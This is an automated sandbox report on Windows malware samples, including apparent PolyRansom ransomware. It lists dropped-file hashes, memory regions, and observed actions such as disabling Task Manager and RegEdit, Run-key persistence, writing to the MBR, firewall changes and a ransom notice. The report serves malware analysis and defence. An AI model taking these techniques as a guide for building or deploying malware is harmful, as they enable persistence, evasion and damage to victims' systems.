memory/1484-144-0x0000000000460000-0x00000000004C8000-memory.dmp
memory/1116-147-0x00000000030C0000-0x00000000030D0000-memory.dmp
memory/1868-151-0x0000000000400000-0x0000000000410000-memory.dmp
memory/1624-152-0x00000000002B0000-0x000000000037E000-memory.dmp
memory/1624-153-0x0000000000400000-0x00000000005DE000-memory.dmp
memory/1012-154-0x0000000000400000-0x0000000000439000-memory.dmp
memory/2000-155-0x0000000000180000-0x00000000001B1000-memory.dmp
memory/2000-157-0x0000000000400000-0x0000000000450000-memory.dmp
memory/1484-156-0x0000000000460000-0x00000000004C8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\[email protected]
| MD5 | 0002dddba512e20c3f82aaab8bad8b4d |
| SHA1 | 493286b108822ba636cc0e53b8259e4f06ecf900 |
| SHA256 | 2d68fe191ba9e97f57f07f7bd116e53800b983d267da99bf0a6e6624dd7e5cf7 |
| SHA512 | 497954400ab463eb254abe895648c208a1cc951ecb231202362dadbe3ffb49d8d853b487589ce935c1dc8171f56d0df95093ffc655c684faa944c13bcfd87b8b |
\Program Files (x86)\antiviruspc2009\avpc2009.exe
| MD5 | c18a7323332b3292a8e0f1c81df65698 |
| SHA1 | bcb8f34cbe0137e888d06acbcb6508417851a087 |
| SHA256 | 9c42eca99e96a7402716fd865b57ea601fb9a18477fe2ab890bdbcd3052f68f8 |
| SHA512 | 4d48d11f3d0a740b9193e17782c77b01f52dd6e8324755aa81188295a0caed0718d330453bb02ca8bc942ee5588928e57a0d89d90d6b1c32690338c5eae8e1ad |
\Program Files (x86)\antiviruspc2009\avpc2009.exe
| MD5 | c18a7323332b3292a8e0f1c81df65698 |
| SHA1 | bcb8f34cbe0137e888d06acbcb6508417851a087 |
| SHA256 | 9c42eca99e96a7402716fd865b57ea601fb9a18477fe2ab890bdbcd3052f68f8 |
| SHA512 | 4d48d11f3d0a740b9193e17782c77b01f52dd6e8324755aa81188295a0caed0718d330453bb02ca8bc942ee5588928e57a0d89d90d6b1c32690338c5eae8e1ad |
memory/980-161-0x0000000000000000-mapping.dmp
memory/1600-158-0x0000000000000000-mapping.dmp
memory/1688-163-0x0000000000000000-mapping.dmp
memory/320-165-0x0000000000000000-mapping.dmp
memory/584-164-0x0000000000350000-0x000000000037E000-memory.dmp
\Users\Admin\qiUYEYUk\vQkIcwYI.exe
| MD5 | 72723b53808ffa17ef9478bfa115b39c |
| SHA1 | f3e3084cb9a087436f441da608fed0ff64cdfa80 |
| SHA256 | e52853a3ee9e0c53a525f16cc178c81f6a615ba413225f039377287085190697 |
| SHA512 | 185b37414c805db49eedb03b58023eabe65580f9c4ebb5666112c07a08fc0208a727373cbdc0d648b12a199d7a6c66fce1e1dafbd030ef1bb48a7a6ad9e5b0d1 |
\Program Files (x86)\antiviruspc2009\pthreadVC2.dll
| MD5 | 0ab7d0e87f3843f8104b3670f5a9af62 |
| SHA1 | 10c09a12e318f0fbebf70c4c42ad6ee31d9df2e5 |
| SHA256 | 8aecab563b3c629e8f9dcd525dc2d6b1903f6c600637e63b1efe05e3c64d757b |
| SHA512 | e08e17167edf461c0fca1e8b649c0c395793e80f5400f5cbb7d7906d0c99e955fcf6be2300db8663d413c4b3ffb075112a6ce5bf259553c0fd3d76200ee0d375 |
C:\Program Files (x86)\antiviruspc2009\pthreadVC2.dll
| MD5 | 0ab7d0e87f3843f8104b3670f5a9af62 |
| SHA1 | 10c09a12e318f0fbebf70c4c42ad6ee31d9df2e5 |
| SHA256 | 8aecab563b3c629e8f9dcd525dc2d6b1903f6c600637e63b1efe05e3c64d757b |
| SHA512 | e08e17167edf461c0fca1e8b649c0c395793e80f5400f5cbb7d7906d0c99e955fcf6be2300db8663d413c4b3ffb075112a6ce5bf259553c0fd3d76200ee0d375 |
\Program Files (x86)\antiviruspc2009\bzip2.dll
| MD5 | 4143d4973e0f5a5180e114bdd868d4d2 |
| SHA1 | b47fd2cf9db0f37c04e4425085fb953cbce81478 |
| SHA256 | da25db24809479051d980be5e186926dd53233a76dfe357a455387646befca76 |
| SHA512 | e21827712a4870461921e7996506ffe456dd2303b69de370aa0499dde2e4747a73d8c0e8bd7d91c5bbc414ed5ee06f36d172237489494b3dd311ccd95ba07ebc |
C:\Program Files (x86)\antiviruspc2009\bzip2.dll
| MD5 | 4143d4973e0f5a5180e114bdd868d4d2 |
| SHA1 | b47fd2cf9db0f37c04e4425085fb953cbce81478 |
| SHA256 | da25db24809479051d980be5e186926dd53233a76dfe357a455387646befca76 |
| SHA512 | e21827712a4870461921e7996506ffe456dd2303b69de370aa0499dde2e4747a73d8c0e8bd7d91c5bbc414ed5ee06f36d172237489494b3dd311ccd95ba07ebc |
\Program Files (x86)\antiviruspc2009\libltdl3.dll
| MD5 | 00a71b4afda8033235432b1c433fecc7 |
| SHA1 | d7b0c218aa8fec1c60ada26a09d9e0d9601985ca |
| SHA256 | f9c9d2b92efb80f6d11df52735b8bddd099847cc79ba56650793b21a0923b1cd |
| SHA512 | 96635e66d9781ad4d2414271f6a0904cf880ed94fc19186ef4da5f88f24e14ef1591fdc90e27db15a6021847c592688d0034f20e2e50ca93bf8c6db27e8c510a |
C:\Program Files (x86)\antiviruspc2009\libltdl3.dll
| MD5 | 00a71b4afda8033235432b1c433fecc7 |
| SHA1 | d7b0c218aa8fec1c60ada26a09d9e0d9601985ca |
| SHA256 | f9c9d2b92efb80f6d11df52735b8bddd099847cc79ba56650793b21a0923b1cd |
| SHA512 | 96635e66d9781ad4d2414271f6a0904cf880ed94fc19186ef4da5f88f24e14ef1591fdc90e27db15a6021847c592688d0034f20e2e50ca93bf8c6db27e8c510a |
C:\Users\Admin\AppData\Local\Temp\[email protected]
| MD5 | 02f471d1fefbdc07af5555dbfd6ea918 |
| SHA1 | 2a8f93dd21628933de8bea4a9abc00dbb215df0b |
| SHA256 | 36619636d511fd4b77d3c1052067f5f2a514f7f31dfaa6b2e5677fbb61fd8cba |
| SHA512 | 287b57b5d318764b2e92ec387099e7e313ba404b73db64d21102ba8656636abbf52bb345328fe58084dc70414c9e2d8cd46abd5a463c6d771d9c3ba68759a559 |
C:\Program Files (x86)\antiviruspc2009\avpc2009.exe
| MD5 | c18a7323332b3292a8e0f1c81df65698 |
| SHA1 | bcb8f34cbe0137e888d06acbcb6508417851a087 |
| SHA256 | 9c42eca99e96a7402716fd865b57ea601fb9a18477fe2ab890bdbcd3052f68f8 |
| SHA512 | 4d48d11f3d0a740b9193e17782c77b01f52dd6e8324755aa81188295a0caed0718d330453bb02ca8bc942ee5588928e57a0d89d90d6b1c32690338c5eae8e1ad |
memory/1692-176-0x0000000001000000-0x00000000010CE000-memory.dmp
memory/320-177-0x0000000000400000-0x0000000000CFB000-memory.dmp
memory/1012-178-0x0000000001C90000-0x0000000001CC2000-memory.dmp
C:\Users\Admin\qiUYEYUk\vQkIcwYI.exe
| MD5 | 72723b53808ffa17ef9478bfa115b39c |
| SHA1 | f3e3084cb9a087436f441da608fed0ff64cdfa80 |
| SHA256 | e52853a3ee9e0c53a525f16cc178c81f6a615ba413225f039377287085190697 |
| SHA512 | 185b37414c805db49eedb03b58023eabe65580f9c4ebb5666112c07a08fc0208a727373cbdc0d648b12a199d7a6c66fce1e1dafbd030ef1bb48a7a6ad9e5b0d1 |
C:\Users\Admin\AppData\Local\Temp\[email protected]
| MD5 | 0315c3149c7dc1d865dc5a89043d870d |
| SHA1 | f74546dda99891ca688416b1a61c9637b3794108 |
| SHA256 | 90c2c3944fa8933eefc699cf590ed836086deb31ee56ec71b5651fd978a352c9 |
| SHA512 | 7168dc244f0e400fa302801078e3faec8cdd2d3cb3b8baaab0a1b3c0929d7cf41e54bfbe530ad5ce96a6b63761f7866d26aaae788c3138c34294174091478112 |
memory/904-181-0x0000000000000000-mapping.dmp
\ProgramData\IIwkMYAg\wqccYwoU.exe
| MD5 | 80ad3217c194a873f0ad7eaf40702b0b |
| SHA1 | ebca8d01b9b7c947a3623a8736b7c9b8182d89a1 |
| SHA256 | 1734a7cb28819bcd6bd6121e1eeadb53e109159ab82c0159e209c982364c6ff3 |
| SHA512 | cf1c090530438a9887d0444dccdb43359596e76bc93d5738983475870973940eef3e26a56234e3add9aae7cbd9472f79882c6ed1b4fad87357e87e4536bdd3ea |
\Users\Admin\qiUYEYUk\vQkIcwYI.exe
| MD5 | 72723b53808ffa17ef9478bfa115b39c |
| SHA1 | f3e3084cb9a087436f441da608fed0ff64cdfa80 |
| SHA256 | e52853a3ee9e0c53a525f16cc178c81f6a615ba413225f039377287085190697 |
| SHA512 | 185b37414c805db49eedb03b58023eabe65580f9c4ebb5666112c07a08fc0208a727373cbdc0d648b12a199d7a6c66fce1e1dafbd030ef1bb48a7a6ad9e5b0d1 |
memory/288-179-0x0000000000000000-mapping.dmp
memory/1496-188-0x0000000000400000-0x000000000043F000-memory.dmp
memory/1464-187-0x0000000000000000-mapping.dmp
memory/1496-191-0x0000000000230000-0x0000000000242000-memory.dmp
memory/1864-190-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\[email protected]
| MD5 | e1b69c058131e1593eccd4fbcdbb72b2 |
| SHA1 | 6d319439cac072547edd7cf2019855fa25092006 |
| SHA256 | b61c53f4137c41aa0a5538fc9a746034b3a903cc4b1b3c8b5f3d3118e1e2bd8f |
| SHA512 | 161a5923dc3a6507cbee3b547edcef4fbfe1dc6a04832c2472b1e635d758d1503a61361c2a83a13a0d8e4607516fda4ae6462a74df66b20a7c93174bbcc7129c |
C:\ProgramData\IIwkMYAg\wqccYwoU.exe
| MD5 | 80ad3217c194a873f0ad7eaf40702b0b |
| SHA1 | ebca8d01b9b7c947a3623a8736b7c9b8182d89a1 |
| SHA256 | 1734a7cb28819bcd6bd6121e1eeadb53e109159ab82c0159e209c982364c6ff3 |
| SHA512 | cf1c090530438a9887d0444dccdb43359596e76bc93d5738983475870973940eef3e26a56234e3add9aae7cbd9472f79882c6ed1b4fad87357e87e4536bdd3ea |
memory/1012-194-0x0000000001C90000-0x0000000001CC2000-memory.dmp
memory/1496-197-0x0000000000400000-0x000000000043F000-memory.dmp
memory/1012-196-0x0000000001C90000-0x0000000001CBE000-memory.dmp
memory/904-195-0x0000000000400000-0x0000000000432000-memory.dmp
\ProgramData\IIwkMYAg\wqccYwoU.exe
| MD5 | 80ad3217c194a873f0ad7eaf40702b0b |
| SHA1 | ebca8d01b9b7c947a3623a8736b7c9b8182d89a1 |
| SHA256 | 1734a7cb28819bcd6bd6121e1eeadb53e109159ab82c0159e209c982364c6ff3 |
| SHA512 | cf1c090530438a9887d0444dccdb43359596e76bc93d5738983475870973940eef3e26a56234e3add9aae7cbd9472f79882c6ed1b4fad87357e87e4536bdd3ea |
memory/472-185-0x0000000000000000-mapping.dmp
memory/1352-199-0x0000000000020000-0x00000000000A2000-memory.dmp
memory/548-198-0x00000000003A0000-0x0000000000592000-memory.dmp
memory/780-200-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\[email protected]
| MD5 | d0deb2644c9435ea701e88537787ea6e |
| SHA1 | 866e47ecd80da89c4f56557659027a3aee897132 |
| SHA256 | ad6cd46f373aadad85fab5ecdb4cb4ad7ebd0cbe44c84db5d2a2ee1b54eb5ec3 |
| SHA512 | 6faac2e1003290bb3a0613ee84d5c76d3c48a4524e97975e9174d6fcfb5a6a48d6648b06ed5a4c10c3349f70efffc6a08a185fdeb0824250ae044b96ef39fcdf |
memory/2036-202-0x0000000000000000-mapping.dmp
memory/960-201-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\[email protected]
| MD5 | d5e5853f5a2a5a7413f26c625c0e240b |
| SHA1 | 0ced68483e7f3742a963f2507937bb7089de3ffe |
| SHA256 | 415dd13c421a27ed96bf81579b112fbac05862405e9964e24ec8e9d4611d25f3 |
| SHA512 | 49ea9ab92ce5832e702fac6f56a7f7168f60d8271419460ed27970c4a0400e996c2ea097636fc145e355c4df5cfbf200b7bf3c691133f72e4cad228f570b91e4 |
memory/2036-206-0x00000000013D0000-0x000000000150B000-memory.dmp
memory/1012-207-0x0000000001C90000-0x0000000001CBE000-memory.dmp
memory/1864-208-0x0000000000400000-0x000000000042E000-memory.dmp
memory/1496-209-0x0000000000400000-0x000000000043F000-memory.dmp
memory/2108-212-0x0000000000000000-mapping.dmp
C:\Windows\9DB7.tmp
| MD5 | 347ac3b6b791054de3e5720a7144a977 |
| SHA1 | 413eba3973a15c1a6429d9f170f3e8287f98c21c |
| SHA256 | 301b905eb98d8d6bb559c04bbda26628a942b2c4107c07a02e8f753bdcfe347c |
| SHA512 | 9a399916bc681964af1e1061bc0a8e2926307642557539ad587ce6f9b5ef93bdf1820fe5d7b5ffe5f0bb38e5b4dc6add213ba04048c0c7c264646375fcd01787 |
C:\Users\Admin\AppData\Local\Temp\[email protected]
| MD5 | 7dde6427dcf06d0c861693b96ad053a0 |
| SHA1 | 086008ecfe06ad06f4c0eee2b13530897146ae01 |
| SHA256 | 077c04ee44667c5e1024652a7bbe7fff81360ef128245ffd4cd843b7a56227cf |
| SHA512 | 8cf162f83ebfa2f3db54b10d5b0e6af590e97596ac2d469058a98340bf27de2866e679c777aa46dd530db44c27503d4cea8c34d96cb83b71477a806b5ab7c1b9 |
memory/2116-214-0x0000000000000000-mapping.dmp
memory/2060-210-0x0000000000000000-mapping.dmp
memory/2184-221-0x0000000000000000-mapping.dmp
memory/1496-222-0x0000000000400000-0x000000000043F000-memory.dmp
memory/1600-225-0x0000000000400000-0x0000000000415000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\[email protected]
| MD5 | 0002dddba512e20c3f82aaab8bad8b4d |
| SHA1 | 493286b108822ba636cc0e53b8259e4f06ecf900 |
| SHA256 | 2d68fe191ba9e97f57f07f7bd116e53800b983d267da99bf0a6e6624dd7e5cf7 |
| SHA512 | 497954400ab463eb254abe895648c208a1cc951ecb231202362dadbe3ffb49d8d853b487589ce935c1dc8171f56d0df95093ffc655c684faa944c13bcfd87b8b |
memory/2224-228-0x0000000000000000-mapping.dmp
memory/2252-230-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\[email protected]
| MD5 | 8cd7c19b6dc76c116cdb84e369fd5d9a |
| SHA1 | 5e3ecd3e4ef8adc294db1e3525cdbde46b2b7ddc |
| SHA256 | 47769a82ac9994bf50fdb7ff521d2364775afea3da02d55450448a25e6f94645 |
| SHA512 | 909d0a2ec4af33c374d7453926e5999badd2f9fa79d0648a7308f63911f673ae34ec275917999199e9fb3a669af5c4aa460e7639c5e346f261decd28b520039a |
C:\Users\Admin\AppData\Local\Temp\[email protected]
| MD5 | 8cd7c19b6dc76c116cdb84e369fd5d9a |
| SHA1 | 5e3ecd3e4ef8adc294db1e3525cdbde46b2b7ddc |
| SHA256 | 47769a82ac9994bf50fdb7ff521d2364775afea3da02d55450448a25e6f94645 |
| SHA512 | 909d0a2ec4af33c374d7453926e5999badd2f9fa79d0648a7308f63911f673ae34ec275917999199e9fb3a669af5c4aa460e7639c5e346f261decd28b520039a |
C:\Users\Admin\AppData\Local\Temp\[email protected]
| MD5 | 03baeba6b4224371cca7fa6f95ae61c0 |
| SHA1 | 8731202d2f954421a37b5c9e01d971131bd515f1 |
| SHA256 | 61a9e3278b6bcc29a2a0405b06fb2a3bbcb1751c3dd564a8f94cc89ea957ec35 |
| SHA512 | 386643b0a52b6b1a53e81a8500d040b6415e532ebaffd1be8d1afd4ccb10f6c0342cf734b688ec803b960339284c8d9669e638b1648d9cc734cf7367659c7fd0 |
memory/2176-220-0x0000000000000000-mapping.dmp
memory/2316-237-0x0000000000000000-mapping.dmp
memory/2340-239-0x0000000000000000-mapping.dmp
memory/1600-240-0x0000000000400000-0x0000000000415000-memory.dmp
memory/2252-241-0x0000000000400000-0x0000000000423000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\[email protected]
| MD5 | 8803d517ac24b157431d8a462302b400 |
| SHA1 | b56afcad22e8cda4d0e2a98808b8e8c5a1059d4e |
| SHA256 | 418395efd269bc6534e02c92cb2c568631ada6e54bc55ade4e4a5986605ff786 |
| SHA512 | 38fdfe0bc873e546b05a8680335526eec61ccc8cf3f37c60eee0bc83ec54570077f1dc1da26142488930eabcc21cb7a33c1b545a194cbfb4c87e430c4b2bfb50 |
memory/320-242-0x0000000000400000-0x0000000000CFB000-memory.dmp
memory/2284-235-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\[email protected]
| MD5 | e1b69c058131e1593eccd4fbcdbb72b2 |
| SHA1 | 6d319439cac072547edd7cf2019855fa25092006 |
| SHA256 | b61c53f4137c41aa0a5538fc9a746034b3a903cc4b1b3c8b5f3d3118e1e2bd8f |
| SHA512 | 161a5923dc3a6507cbee3b547edcef4fbfe1dc6a04832c2472b1e635d758d1503a61361c2a83a13a0d8e4607516fda4ae6462a74df66b20a7c93174bbcc7129c |
memory/2284-244-0x0000000000400000-0x0000000000432000-memory.dmp
memory/2116-245-0x0000000000400000-0x0000000000843000-memory.dmp
memory/1464-243-0x00000000004F0000-0x0000000000637000-memory.dmp
memory/1068-246-0x00000000010F0000-0x000000000112C000-memory.dmp
memory/2392-248-0x0000000000000000-mapping.dmp
memory/2380-249-0x0000000000000000-mapping.dmp
memory/2568-251-0x0000000000000000-mapping.dmp
memory/1012-253-0x0000000000400000-0x0000000000439000-memory.dmp
memory/2620-255-0x0000000000000000-mapping.dmp
memory/2612-256-0x0000000000000000-mapping.dmp
memory/2664-257-0x0000000000000000-mapping.dmp
memory/2580-254-0x0000000000000000-mapping.dmp
memory/2684-259-0x0000000000000000-mapping.dmp
memory/2676-258-0x0000000000000000-mapping.dmp
memory/2728-261-0x0000000000000000-mapping.dmp
memory/2736-262-0x0000000000000000-mapping.dmp
memory/2568-265-0x0000000000220000-0x0000000000223000-memory.dmp
memory/2184-264-0x0000000001D00000-0x0000000001D67000-memory.dmp
memory/780-269-0x0000000000120000-0x0000000000159000-memory.dmp
memory/2340-270-0x0000000010000000-0x0000000010010000-memory.dmp
memory/2252-274-0x0000000000240000-0x0000000000263000-memory.dmp
memory/2252-272-0x0000000000240000-0x0000000000263000-memory.dmp
memory/2116-277-0x0000000000850000-0x00000000008B0000-memory.dmp
memory/2252-276-0x0000000000240000-0x0000000000263000-memory.dmp
memory/2184-267-0x0000000000400000-0x000000000054F000-memory.dmp
memory/2568-266-0x0000000000400000-0x000000000044F000-memory.dmp
memory/2580-279-0x0000000001FE0000-0x0000000002012000-memory.dmp
memory/2796-282-0x0000000000000000-mapping.dmp
memory/2580-287-0x0000000002010000-0x0000000002042000-memory.dmp
memory/320-286-0x0000000000400000-0x0000000000CFB000-memory.dmp
memory/2864-281-0x0000000000000000-mapping.dmp
memory/2876-280-0x0000000000000000-mapping.dmp
memory/2852-278-0x0000000000000000-mapping.dmp
memory/780-289-0x0000000000120000-0x0000000000159000-memory.dmp
memory/2116-288-0x00000000034C0000-0x00000000034C3000-memory.dmp
memory/2864-290-0x0000000000400000-0x0000000000439000-memory.dmp
memory/3064-292-0x0000000000000000-mapping.dmp
memory/2260-293-0x0000000000000000-mapping.dmp
memory/320-294-0x0000000000400000-0x0000000000CFB000-memory.dmp
memory/2284-296-0x0000000000400000-0x0000000000432000-memory.dmp
memory/2376-295-0x0000000000000000-mapping.dmp
memory/964-297-0x0000000000400000-0x0000000000A06000-memory.dmp
memory/584-299-0x000007FEFB591000-0x000007FEFB593000-memory.dmp
memory/1752-298-0x0000000000400000-0x0000000000438000-memory.dmp
memory/1868-300-0x0000000000400000-0x0000000000410000-memory.dmp
memory/1692-302-0x0000000001000000-0x00000000010CE000-memory.dmp
memory/2000-303-0x0000000000400000-0x0000000000450000-memory.dmp
memory/1624-301-0x0000000000400000-0x00000000005DE000-memory.dmp
memory/320-304-0x0000000000400000-0x0000000000CFB000-memory.dmp
memory/2620-305-0x0000000000160000-0x0000000000192000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-09-29 12:38
Reported
2022-09-29 12:40
Platform
win10v2004-20220812-en
Max time kernel
43s
Max time network
156s
Command Line
Signatures
Checks for common network interception software
Enumerates VirtualBox registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Disables Task Manager via registry modification
Downloads MZ/PE file
Executes dropped EXE
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Stops running service(s)
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\WINDOWS\\Web\\rundll32.exe" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\AVPCC = "C:\\WINDOWS\\Cursors\\avp.exe" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Checks installed software on the system
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "DANGER" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Äëÿ òîãî ÷òîáû âîññòàíîâèòü íîðìàëüíóþ ðàáîòó ñâîåãî êîìïüþòåðà íå ïîòåðÿâ ÂÑÞ èíôîðìàöèþ! È ñ ýêîíîìèâ äåíüãè, ïðèøëè ìíå íà e-mail [email protected] êîä ïîïîëíåíèÿ ñ÷åòà êèåâñòàð íà 25 ãðèâåíü.  îòâåò â òå÷åíèå äâåíàäöàòè ÷àñîâ íà ñâîé e-mail òû ïîëó÷èøü ôàèë äëÿ óäàëåíèÿ ýòîé ïðîãðàììû." | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\AnVi\splash.mp3 | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File created | C:\Program Files (x86)\AnVi\virus.mp3 | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\WINDOWS\Web | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Program crash
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\Desktop\WallpaperOriginX = "210" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\Desktop\WallpaperOriginY = "187" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\Desktop\MenuShowDelay = "9999" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\sTimeFormat = "ÕÓÉ" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\Desktop | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window title = ":::::::::::::::::: ÌÎÉ ÕÓÉ ÏÐÎÒÓÕ À ÏÈÇÄÀ ÃÍÈÅÒ ::::::::::::::::::" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Use FormSuggest = "Yes" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Window title = ":::::::::::::::::: ÌÎÉ ÕÓÉ ÏÐÎÒÓÕ À ÏÈÇÄÀ ÃÍÈÅÒ ::::::::::::::::::" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Modifies Internet Explorer start page
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Start Page = "http://poetry.rotten.com/lightning/" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "http://poetry.rotten.com/lightning/" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
